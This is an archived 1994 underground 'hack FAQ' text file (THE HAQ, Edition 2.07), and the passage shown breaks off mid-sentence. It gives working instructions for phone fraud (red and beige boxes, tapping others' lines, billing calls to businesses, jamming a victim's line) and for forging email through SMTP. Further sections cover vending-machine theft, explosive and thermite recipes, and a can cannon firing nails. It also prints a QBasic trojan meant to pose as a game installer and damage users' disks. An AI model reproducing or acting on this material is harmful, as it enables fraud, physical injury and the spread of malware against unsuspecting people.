what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

thehaq.txt

thehaq.txt
Posted Aug 17, 1999

No information is available for this file.

tags | paper
SHA-256 | bf4d3742eed5f3f3db7c1025001e80da4382a9f0309cab98cb0a0ce09e816a2b

thehaq.txt

Change Mirror Download
Jun 13, 1994 19:54 from Belisarius


_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***


+---------------+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+---------------+



"Knowledge is power" --Francis Bacon
"United we stand, divided we fall" --Aesop


=+=+=+=+=+=+=+=+=+= HACK-FAQ! Non-Copyright Notice =+=+=+=+=+=+=+=+=
= =
+ MatrixMage Publications. 1994 No rights reserved. +
= =
+ This file may be redistributed provided that the file and this +
= notice remain intact. This article may not under any =
+ circumstances be resold or redistributed for compensation of any +
= kind. Distribution of THE HACK-FAQ! is encouraged and promoted. =
+ +
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=


<*> Edited by <*>


# Editor-in-Chief #
Belisarius < temporary loss of E-mail >
can be reached on ISCA, Shadow, SkyNET, Brinta and
Baltimore 2600 Meetings and other nameless locations.


# Asst. Editor (non communicado) #
Neurophire (on Shadow and N P on ISCA)


A MatrixMage Electronic Publication


Special Thanks to the Following Contributors:
Z Maestro RA of ISCA Underground>
DINO RA of Shadow Hack and Crack>
Artimage RA of SKYNET Underground>

Faunus Revolution Miska Informatik
Matrixx Amarand Crypto Steelyhart aBBa / PfA
Beelzebub Redbeard Squarewave
IO CyberSorceror Caustic
Doktor Nil Skipster Walrus
CPT Ozone Abort Kyoti
Carsenio Aero Phrack


AND NOW A WORD FROM YOUR EDITOR:

Throughout history mankind has been afraid of the unknown.
Before lightning could be scientifically explained it was blamed on
the anger of the gods. This belief in mysticism persisted throughout
the ages (and still does today). Later as man acquired simple herbal
and chemical knowledge, these men were revered as mages, users of
mystical arts derived from the old gods. But as organized religion
(i.e. Christianity especially Roman Catholicism) spread and came to
dominate society (became the powers that be), the mage was no longer
revered. The mage (who only sought to understand the world around
himself and make the world a better place) was persecuted, attacked
and driven underground by the church. But driving these mages
underground (out of society) did not stop there ideas from spreading
or them from continuing to work. The church label Copernicus as a
heretic and mage and only this century has the Roman Catholic church
accepted his principles (heliocentric universe) as fact.
So are 'hackers' the same today. We surf the nets seeking
knowledge and information (and hopefully understanding). Information
and understanding the meaning and import of the information are the
two greatest commodities and bases of power in the world today.
These things are easy to disseminate and gather in the electronic
world. The matrix (cyberspace/web/net [whichever term you choose]
is able to influence and control information faster and better than
ever before. This makes many afraid of the cyberculture (not to
mention a deep-seated techno-fear of many people, anything new and
technical is bad).
We are a new breed of mage; seeking knowledge, desiring
understanding, persecuted by the powers that be. This is why I have
started this publication. We are the MatrixMages! Our mission is
to learn and to pass on that knowledge.

-=> Belisarius <=-
*********************************************************************
What is 'Cyberpunk' and the Underground?

"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby. It gets stored, and copied, and sent out all
over the world, and people read it. It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace. Eventually somebody uses it, and I know that I have the
power to change the world. Somewhere, someplace, somebody changed
something using information I changed or created. I helped to
change the world." --Unknown

That is the attitude of many of the people who, knowingly or not, are
members of this hyped/wired/cyber culture. Some who may read this
will see some of their undefined beliefs, hopes and feelings
reflected in the above quote. And, as the quote says, they will
help spread it. Somewhere, somehow, that quote will change the
world.

But only if you work to change it. Remember that information and
knowledge a powerful commodities. He who has information cannot
be beaten. So above all the most important thing to do in the
"Underground" is to gather information. This means that you have to
work and put in some effort. You don't get something' for nothing!
So work hard and together we can change the world!

Keep up with latest editions. (Sorry there haven't been many lately
but exams and not failing out took precedence!)

The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre,
or any contributor are not responsible for any consequences.
You use this information at your own risk.

*********************************************************************
CONTENTS
*********************************************************************
Sections
I. Phone Fun
(Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
II. Fake E-Mail
(Fooling UUCP)
III. Social Engineering
(Free sodas, Dumpster Diving, ATMs, Carding)
IV. The Big Bang
(Making Weapons and Explosives)
V. Infection
(Virii, Trojans, Worms and other creepy crawlies)
VI. NEWBIES READ THIS
(Basic Hacking)
VII. Screwing with the most widespread operating system on the net
(UNIX / AIX Hacking)
VIII. Screwing with the most secure operating system on the net
(VAX/VMS Hacking)
IX. Screwing with the most widespread operating system on PCs
(MS-DOS Hacks)
X. Finding out what that encrypted info is
(Cracking programs)
XI. How do I keep my info secure
(PGP / Cryptology)
XII. Chemistry 101
(explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
(Underground electronics)
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)
XV. Tuning in to what's on the radio waves
(Radios and Scanning)

Appendices
A. FTP sites with useful info
B. Interesting Gophers
C. Informative USENET Newsgroups
D. Publications and Zines
E. Books
F. Files and Papers
G. Cataglogs
H. PGP Keys
*********************************************************************


=====================================================================
I. Phone Fun
(Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)

WHAT IS A RED BOX AND HOW DO I MAKE ONE?
(from Doktor Nil)

First note: a redbox is merely a device which plays the tone a
payphone makes when you insert money. You just play it through the
mike on the handset. You would think that the Phone Co. would mute
the handset until you put a quarter in, and perhaps they are starting
to build phones like that, but I have yet to see one.

What you need:
- Radio Shack 33 memory Pocket Tone Dialer
- 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address
below)
- A solder gun.
- Someone who can point out the crystal in the Tone
Dialer.

Instructions:
1) Open up the back of the tone dialer. Use screwdriver.

2) Locate crystal. It should be toward the right side.
It will be smaller than the 6.5 MHz one you bought, but otherwise
vaguely similar. It is basically capsule-shaped, with two electrodes
coming out of the bottom which are soldered onto a circuit board.
It's on the _left_ side, basically the third large crystal thing from
the bottom, about 1.5 cm long, metallic, thin.

3) De-solder, and de-attach, crystal. Heat the solder that the
crystal is seated in; remove crystal.

4) Attach 6.5 MHz crystal. It is easiest just to use the solder which
is already there from the old crystal, that way there is less chance
of you dropping hot solder somewhere it shouldn't be and losing
everything. Heat first one drop of solder with the solder gun, and
seat one electrode of the 6.4 MHz crystal in it, then do the same
with the other. This is the easiest part to mess up, be careful that
both drops of solder don't run together.

5) Put cover back on. you are done.


How to use: Five presses of the "*" key will make the quarter sound.
I think fewer presses make nickel/dime sounds, but I can't remember
specifically. Here in Michigan, you can simply hold it up to the
handset and press memory recall button 1 (where you have conveniently
recorded five *'s -read the tone dialer directions on how to do this)
and get a quarter credit, _IF_ you are calling LD. Keep making the
tone to get additional credits. There is a maximum number of credits
you can have at once.

To make a local call this may not work. You need to first put in a
real coin, then you can use the redbox for additional credits. There
may be a way around this, however: Call the operator, and ask her to
dial your number for you. She should do this without asking why, it
is a regular service. If you need an excuse, say the "4" key isn't
working, or something. She will ask you to insert your money. At
this point use the redbox. If all goes well, she dials your number
and you're in business. If she says "Will you do that one more time,"
or "Who is this," or any variations, hang up and walk away.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT DO THESE CRYSTALS LOOK LIKE?
In most cases, a rectangular metal can with two bare wires coming out
of one end, and a number like "6.50000" stamped on one side.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
(from Matrixx)
6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
is the easiest to find (Radio Shack)

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
The crystals are available from Digi-Key. Call 1-800-DIGIKEY
(1-800-344-4539) for more info. The part order number from
DIGI-KEY is x-415-ND

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
(from DINO)
For a Radio Shack conversion red box: a nickel is one * and a quarter
is 5 *'s

Here are the freqs for a red box:

$.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse
with 33 millisecond pause between each pulse
$.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66
millisecond pauses
$.05 one pulse at the above freqs for 66 milliseconds!

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
(from Faunus, Carsenio)
If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT
is a general term for Customer owned or "Bell-independent" phone
companies. Sometimes they are more shabbily constructed than real
fortress phones but others look about the same except for a lack of
phone company logo.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

FOOLING COCOTS USING 800 NUMBERS?
You call up an 800 number as any public phone HAS too let you dial
800 numbers for free. Then you let the person who answers the 800
number hang up on you, THEN you dial your number that you want to
call free. OK MOST COCOTs disable the keypad on the phone so you
CANT just dial the number, you have to use a pocket tone dialer to
dial the number.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I MAKE A BEIGE BOX?
(from Neurophyre)
Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
clips, ratchet wrench, 7/16-inch hex head

1. Cut the head off one end of the phone cord.
2. Strip the coating back about two (2) inches.
3. Look for the red wire, and the green wire.
4. Mark one clip green and put it on the green.
5. Mark the other red and put it on the red.
6. Once you have them soldered and insulated, plug the other end
(that still has the head) into a phone.
7. Go out in the daytime and look for green bases, green rectangular
things sticking about 3 feet out of the ground with a Bell logo on
the front. If you're a lamer, you'll waste your time with a
cable company box or something. I've heard of it.
8. Come back to a secluded one at night. With the wrench, open it
up.
9. Find a set of terminals (look like the threaded end of bolts
in my area) with what should be a red wire and a green wire
coming off them.
10. Plug in your beige box red to red and green to green, pick up the
phone and dial away!

Modems work too as well as taps and shit. You're using someone
else's line (unless you're an idiot) to get phone service. Don't
abuse the same line after the phone bill comes.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

BEIGE BOXING 101
Field Phreaking
by Revolution

At the beginning of the section in the Bell training manual
entitled "One million ways to catch and fry a phreak" it doesn't
have a disclaimer saying "for informational purposes only". So why
the hell should I put one here? Give this file to whoever you want,
just make sure it all stays together, same title, same byline.

Field phreaking gives you everything you've ever wanted: free
long distance calls, free teleconferencing, hi-tech revenge, anything
you can do from your own phone line and more, without paying for it,
or being afraid of being traced. Just be ready to bail if you see
sirens.

How to make a beige box: Easiest box to make. Cut your phone cord
before the jack, strip the wires a little. You should see a red
(ring) wire and a green (tip) wire. If you see yellow and black
wires too just ignore them. Put one set of alligator clips on the
red wire and one on the green wire, and you're set. (You want to
use your laptop computer, but you don't want to ruin your modem's
phone cord? Just unscrew a jack from a wall, unscrew the 4 screws on
the back, and do the same thing as above. Now you can use a phone,
laptop, anything you can plug in a jack.)

How to use: What you have is a lineman's handset. You can use it
from any bell switching apparatus (from now on sw. ap.). These are
on phone poles, where your phone line meets your house, and near
payphones. I'll go into detail below, but basically just open any
box on a telephone pole, and you'll see sets of terminals (screws),
with wires wrapped around them, just like on the back of a phone
jack. These screws are where you need to attach your alligator
clips to get a dial tone. Don't unscrew the screw, you'll just
fuck up some poor guys line, and increase your chances of getting
caught. After the wire goes around the screw, it normally twists
off into the air. Put your clip on the end of the wire. Do the
same with the other clip. If you don't get a dial tone, then
switch terminals.

On telephone poles:

TTI terminals: These must have been built by phreaks, just for
beige boxing. By far the easiest sw. ap. use. The only drawback
is that they only connect to one phone line. These are the fist
sized gray or black boxes that appear where a single phone line
meets the mother line. They look almost like outdoor electric
sockets, that have the snap up covering. They normally have the
letters TTI somewhere on the front. No bolts or screws to take
off, just snap up the top and you will see four screws. Clip in
and happy phreaking. Just click the top down and no one will ever
know you were there (except for the extra digits on their phone
bill.)

Green trees: just about the hardest sw. ap. to beige from (tied
with the bell canister) but if its the only one you can use, go for
it. These are the 3 foot high green/gray metal columns that are no
wider than a telephone pole (which makes them different then the
green bases, see below), that say "Call before digging, underground
cable," or the real old ones just have a bell sign. Usually green
trees are right at the base of phone poles, or within a foot or two
of them. These normally have two 7/16 bolts on one side of the
column, which have to be turned 1/8 a turn counterclockwise, and
the front of the base will slide off. Now you will see a sheet of
metal with a few square holes in it, that has a bolt where the
doorknob on a door would be. Ratchet this one off and the metal
sheet will swing open like a door. On one side of the sheet will
be a paper with a list of #'s this tree connects to. Inside you'll
see a mass of wires flowing from gray stalks of plastic in sets of
two. The whole mass will have a black garbage bag around it, or
some type of covering, but that shouldn't get in the way. The
wires come off the gray stalk, and then attach to the screws that
you can beige from, somewhere near the ground at the center of the
tree. These are on a little metal column, and sometimes are in a
zig-zag pattern, so its hard to find the terminals that match in
the right order to give you a dial tone.

Green bases: The gray/green boxes you see that look just like green
trees, except they are about twice or three times as wide. They
open the same as trees, except there are always 4 bolts, and when
the half slides off, inside is a big metal canister held together
with like 20 bolts. I wouldn't open it, but with a little info
from friends and some social engineering, I learned that inside is
where two underground phone lines are spliced together. Also inside
is either pressurized gas or gel. Pretty messy.

Bell canisters: attached to phone poles at waist level. They are
green (or really rusted brown) canisters about a two feet tall that
have a bell insignia on the side. They will have one or two bolts
at the very bottom of the canister, right above the base plate.
Take the bolts off and twist the canister, and it'll slide right
off. Inside is just like a green tree, except there normally isn't
the list of #'s it connects to.

Mother load: Largest sw. ap. A large gray green box, like 6 x 4,
attached to a telephone pole about three feet off the ground. a big
(foot or two diameter) cable should be coming out the top.
Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a
cabinet with double doors. Fasteners are located in the center of
the box and on the upper edge in the center. Both of these are
held on with a 7/16 bolt. Take the bolts off, and swing the doors
open. On the inside of the right door are instructions to connect
a line, and on the inside of the left door are a list of #'s the
box connects to. And in the box are the terminals. Normally 1,000
phones (yyy-sxxx, where yyy is your exchange and s is the first
number of the suffix, and xxx are the 999 phones the box connects
too).

On houses: follow the phone line to someone's house, and then down
there wall. Either it goes right into there house (then you're
screwed) or it ends in a plastic box. The newer boxes have a screw
in the middle, which you can take off with your fingers, and then
put the box back on when you're done, but the older ones are just
plastic boxes you have to rip off. Inside are 4 terminals, yellow,
black, and red and green, the two you need. Find the Christmas
colors, and phreak out.

On payphones: follow the phone line up from the phone, and sometimes
you'll find a little black box with two screws in it. Undo this,
and you'll find a nice little phone jack. You don't even need your
beige box for that one. If there's not one of those, follow the
wire to a wall it goes into, and sometimes there will be a sw. ap.
like those on houses (see above). Payphones are normally pretty
secure now though, and you probably won't find any of those.

Phreaky things you can do: Jesus, do I have to tell you lamers
everything? Anyway, free long distance calls should be pretty easy,
and get teleconferencing info from somebody else, just make sure
you ANI the # you're calling from before calling Alliance.

Hi-tech revenge!
Possibilities are endless, you have total control of this lamers
line. Most of you guys are probably way to elite for this one, but
you can disconnect his line by loosening a few screws and ripping
his wires at any sw. ap. but here's something a lot better: Get the
faggots number, and then find the mother load sw. ap. it connects
to (not the sw. ap. on his house or on the telephone pole in his
drive way, the _mother_load_) Find his # in the terminals, and then
connect the two terminals with a paper clip or an alligator clip! His phone
will be busy until ma bell
figures out what the hell is going on, and since the last place
they look is the mother load, this usually is at least a week.
Then, of course, is the funniest prank: Beige box from a major
store, like Toys R Us (that's my favorite) and call up ma bell
"Yeah, I'd like all calls to this number forwarded to (his
#)"

That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow,
phunk on IRC, or Revolution on Delphi. Any phreaks out there who
got new info, war stories or some addictive disorder and just need
somebody to talk to, E-mail revolution@delphi.com no PGP needed.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT PHONE NUMBER AM I CALLING FROM?
(from Skipster, et al)

This service is called ANI.

This number may not work, but try it anyway:
(800) 825-6060

You might want to try is dialing 311 ... a recorded message tells you
your phone #. Experiment, but 311 does work, if it doesn't and an
operator picks up, tell her that you were dialing information and
your hand must have slipped.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I USE/DO ALLIANCE TELECONFERENCING?
(from Neurophire, Carsenio)
Set one of these up, it is a 1-800 dial-in conference. Then, grab
your beige box, go to some business, preferably something like a
Wal-Mart or a Radio Shack and beige box off their line. Then call
and set up a teleconference for whenever to be billed to the line
you are calling from. You'll want to know specifically what to ask
for. Alliance teleconferencing is 0-700-456-1000.
Dial the number (you're of course paying for this by the minute)
and you get automated instructions on how to choose the number of
ports for your conference call, and how to dial each participant..

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK?
(from Token)
Just scroll through your favorite business magazine and look for
800#s. Once you get a VMB system you can look for a box being used
and try the default passcodes <0000> , <9999> , etc. Like on the
INet, most people are too dumb to change their passwd. If you're
lucky you might get the root box (I did, the stupid ass's passwd
was <4321>).


=====================================================================
II. Fake E-mail
(Fooling UUCP)

HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
(from Beelzebub, Doktor Nil w/ Belisarius)

1. Telnet to port 25 of any internet server
(eg. telnet site.name.and.address 25)
2. If at all possible, AVOID TYPING "HELO".
3. Type: rcpt to (person to receive fake mail){ENTER}
4. Type: mail from (fake name and address){ENTER}
5. The mail server should ok each time after each name.
6. If it does not:
a) type vrfy and then the name of the person
b) as a last resort use helo, this will login your computer as
having been the source of the mail
7. Retype the commands, it should say ok now.
8. Type: data{ENTER}
9. The first line of the message will be the Subject line
10. Enter your letter
11. To send letter type a "." on an empty line.
12. Then type quit{ENTER}
13. This is traceable by any sysadmin ... don't harass people this
way.
14. If the person receiving the mail uses a shell like elm he/she
will not see the telltale fake message warning
"Apparently-To:(name)" even if not, most people wouldn't know
what it means anyway.
15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
so as to make it look more believable and cover any add-ons the
mail routine might try
16. Put a realistic mail header in the mail message to throw people
off even more. If there are To: and Date: lines then the
program probably won't add them on.
17. Also try to telnet to the site where the recipient has his
account. This works better if you know how to fool it.

=====================================================================
III. Social Engineering
(Free sodas, Dumpster Diving, ATMs, Carding)

WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn't matter), the salt will
short circuit the machine and out will pour change and hopefully
sodas.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ANOTHER WAY OF GETTING FREE SODAS?
This is an easier and actually more reliable way of getting free
sodas. It only wprks pn spme machines though, usually Coca-Cola.
Anyways, put in your change and as the last coin goes down the slot
start rapidly and repeatedly pressing the button of your choice.
If everything works well, then you should get two sodas and your
change back.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW ARE THE TRACKS OF ATM CARD ARRANGED?

The physical layout of the cards are standard. The logical arrangement
of the data stored on the magnetic strip varies from institution to
institution. There are some generally followed layouts, but not
mandatory.

There are actually up to three tracks on a card.

Track 1:
Designed for airline use. Contains name and possibly your account
number. This is the track that is used when the ATM greets you
by name. There is alot of variation in how things are ordered so
occasionally you get 'Greetings Q. John Smith' or
'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'.
This track is also used
with the new airline auto check in (PSA, American, etc).

Track 2:
The main operational track for online use. The first thing
on the track is the Primary Account Number (PAN). This is usually
pretty standard for all cards. Some additional info might be on the
card such as expiration date.
One interesting item is the PIN (Personal Identification Number)
offset. When an ATM verifies a PIN locally, it usually uses an
encryption scheme involving the PAN and a secret KEY. This gives you
a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got
generated). If you want to select your own PIN, they would put the
PIN OFFSET in the clear on the card. Just do modulo 10 arithmetic on
the Natural PIN plus the offset, and you have the selected PIN.
The PIN is never in the clear on your card. Knowing the PIN OFFSET
will not give you the PIN. This will require the SECRET KEY.

Track 3:
The "OFF-LINE" ATM track. It contains information such as your daily
limit, limit left, last access, account number, and expiration date.
The ATM itself could have the ability to write to this track to
update information.

=====================================================================
IV. The Big Bang
(Making Weapons and Explosives)

FLASH POWDERS:
(from Neurophyre)

Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
nitrate.
2. Light it with a long fuse cuz its so bright it might screw up your
eyes.

REAL Cherry Bomb Powder
4 parts by weight of potassium perchlorate
1 part by weight of antimony trisulfide
1 part by weight aluminum powder

Relatively Safe
3 parts by weight of potassium permanganate
2 parts by weight of aluminum powder


*VERY* Shock/Friction/Static/Heat Sensitive!
Use only if suicidal or desperate!
4 parts by weight of potassium chlorate
1 part by weight of sulfur
1 part by weight of aluminum powder

1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get. Use a mortar and
pestle if available, and grind GENTLY. Do not use plastic as this can
build a static charge. Remember, do them SEPARATELY.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING: This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!! AVOID IT when dry! DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
This bucket will never be clean again, in all likelihood.
Try to get clear (non-pine, non-cloudy) ammonia. Or use an
ammonium hydroxide solution from a chemlab. This results in better
but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW TO BUILD A TENNIS BALL CANNON?
1. Get six (6) tin cans.
2. From five of them remove the tops and bottoms.
3. From the last one remove only the top. (this is the last can to
make the breach)
4. The cans should overlap and be fit together to make a long barrel
closed at one end and open at the other.

___________________________________
open --> ()____)_____)_____)_____)_____)_____) <--closed
(barrel) 1 2 3 4 5 6 (breach)

5. Duct tape all of the cans together. USE LOTS OF TAPE!!
6. Put some gunpowder in the bottom of the CANnon.
7. Aim, brace the CANnon.
8. Spray hairspray or pour alcohol on the tennis ball and light.
9. Drop the ball into the can and STAND BACK!

Other ideas:
a) Make explosive tennis balls.
b) Launch potatoes.
c) Launch thumbtacks, nails, broken glass, etc.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)?
(from Terrorist's Handbook)
Materials: cotton, concentrated nitric acid, concentrated sulfuric
acid, distilled water

Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue
litmus paper

Procedure: 1. Pour 10mL of sulfuric acid into beaker.
2. Pour 10mL of nitric acid into beaker with sulfuric
acid.
3. Immediately add 0.5 gram of cotton.
4. Allow it to soak for EXACTLY three(3) minutes.
5. Remove the nitrocellulose.
6. Put the nitrocellulose into a beaker of distilled
water to wash it in.
7. Allow the material to dry.
8. Re-wash it.
9. Once neutral(acid/base) it can be dried and stored.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THERMITE AND HOW DO I MAKE IT?
Thermite is a powder which burns incredibly hot (approx. 2200 deg C)
and can be used to burn through most anything.

Materials: powdered aluminum, powdered iron oxide

Procedure: mix the two powders together as evenly as possible

Ignition: thermite is difficult to ignite but these work
a) mix a small amount of potassium chlorate into the
thermite mixture and ignite with a few drops of
sulfuric acid
b) magnesium strip or 'sparkler' stuck into the powder
which is then lit as a fuse

=====================================================================
V. Infection
(Virii, Trojans, Worms and other creepy crawlies)

WHERE CAN I GET SOME VIRII?
The Virus eXchange BBS in Bulgaria. [number not available - :( ]
Problem: They demand a virus they don't have in their archives to
let you in. Good luck finding one. The best way is to write one,
even if it's in BASIC. It'll probably get you in. They have
THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps
from what I know! For more info, gopher to wiretap.spies.com and dig
around in their online library under technical info.

There are alot of places in the US to get virii too:
The Hell Pit in Chicago has over 1500, and they don't accept the
lame stuff like the ones written in basic, so they're all good ones.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

INTS USED:
(from Belisarius)
You want Int 18h, AH=03h,
Al==Num sectors to write
BX==offset of pointer to buffer
CH=cylinder Number
Cl=sector number
DX=head number
Dl=drive numbers
ES=segment of pointer with buffer

for CH=it's the low 8 bits of 10 bit cylinder number,
for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits),
0-5=sector number.
for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
AH=status, AL=number of sectors written flags, carry set if an error.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

SAMPLE OF A TROJAN
(from Spear)

This is a little trojan I wrote in Qbasic 4.5 It's a bitch!

REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"

How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!

What does it do?
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md. To get rid of them any other way you
would have to format c: or d:


**

_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***


+---------------+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+---------------+

File 2 of 3

=====================================================================
VI. NEWBIES READ THIS
(Basic Hacking)

WHAT MAKES A SYSTEM SECURE?
(from alt.security FAQ)
"The only system which is truly secure is one which is switched off
and unplugged, locked in a titanium lined safe, buried in a concrete
bunker, and is surrounded by nerve gas and very highly paid armed
guards. Even then I wouldn't stake my life on it."
- originally from Gene Spafford

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT WOULD BE IDEAL PROTECTION OF A SYSTEM?
Password Access- Get rid of simple passwords; routinely change all
passwords; regular review/monitoring of password
files

Physical Access- Lock up terminals, personal computers, disks when
not in use; eliminate unnecessary access lines;
disconnect modems when not in use

Other measures- Know who you are talking to; shred all documents;
avoid public domain software; report suspicious
activity (especially non-working hours access)

What this all means is that hackers must now rely on the ineptitude
and laziness of the users of the system rather than the ignorance
of SysOps. The SysOps and SecMans (Security Managers) are getting
smarter and keeping up to date. Not only that, but they are
monitoring the hack/phreak BBSes and publications. So the bottom
line is reveal nothing to overinquisitive newbies...they may be
working for the wrong side.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS A FIREWALL?
(from the comp.security.misc FAQ)
A (Internet) firewall is a machine which is attached (usually)
between your site and a Wide Area Network (WAN). It provides
controllable filtering of network traffic, allowing restricted
access to certain Internet port numbers and blocks access to
pretty well everything else.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW TO HACK WITHOUT GETTING INTO TROUBLE AND DAMAGING COMPUTERS?
1. Don't do damage intentionally.
2. Don't alter files other than than to hide your presence or to
remove traces of your intrusion.
3. Don't leave any real name, handle, or phone number on any
system.
4. Be careful who you share info with.
5. Don't leave your phone number with anyone you don't know.
6. Do NOT hack government computers.
7. Don't use codes unless you HAVE too.
8. Be paranoid!
9. Watch what you post on boards, be as general as possible.
10. Ask questions...but do it politely and don't expect to have
everything handed to you.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT DO I DO IF I AM GETTING NOWHERE?
1. Change parity, data length, and stop bits. The system may not
